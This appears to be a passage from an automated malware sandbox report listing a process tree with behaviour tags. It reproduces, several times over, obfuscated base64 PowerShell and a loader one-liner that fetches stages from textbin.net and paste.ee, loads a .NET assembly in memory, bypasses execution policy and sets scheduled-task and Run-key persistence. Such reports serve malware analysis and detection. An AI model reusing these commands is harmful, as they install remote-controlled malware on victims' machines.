★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:6080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4844
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5136
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2744
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3340
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:5836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2044
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:1760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5820
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:5664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3140
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5824
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:4808
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5840
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
